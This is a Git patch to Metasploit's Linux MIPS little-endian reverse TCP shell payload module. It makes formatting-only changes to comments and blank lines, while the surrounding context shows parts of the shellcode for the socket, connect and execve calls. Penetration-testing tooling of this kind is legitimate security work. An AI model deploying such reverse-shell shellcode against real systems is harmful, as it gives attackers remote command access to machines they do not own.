From 70d4082c0c78f3bef32135493f3df38d3287f0f4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 7 Jan 2014 09:55:36 -0600 Subject: [PATCH] Add formatting blank lines and delete comment --- modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb index 4d7d502611..cd00d25c6b 100644 --- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb @@ -3,9 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -# Written in a hurry using shellforge and my MIPS shellforge loader (avail. on cr0.org) -# + Few removals of unneccessary zero bytes by kost - require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' @@ -23,7 +20,7 @@ module Metasploit3 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => [ - 'rigan ', # Original shellcode + 'rigan ', # Original (mipsbe) shellcode 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, @@ -62,6 +59,7 @@ module Metasploit3 "\xff\xff\x06\x28" + # slti a2,zero,-1 "\x57\x10\x02\x24" + # li v0,4183 # sys_socket "\x0c\x01\x01\x01" + # syscall 0x40404 + # sys_connect # a0: sockfd (stored on the stack) # a1: addr (data stored on the stack) @@ -114,6 +112,7 @@ module Metasploit3 "\xf8\xff\xa5\x27" + # addiu a1,sp,-8 "\xab\x0f\x02\x24" + # li v0,4011 # sys_execve "\x0c\x01\x01\x01" # syscall 0x40404 + return super + shellcode end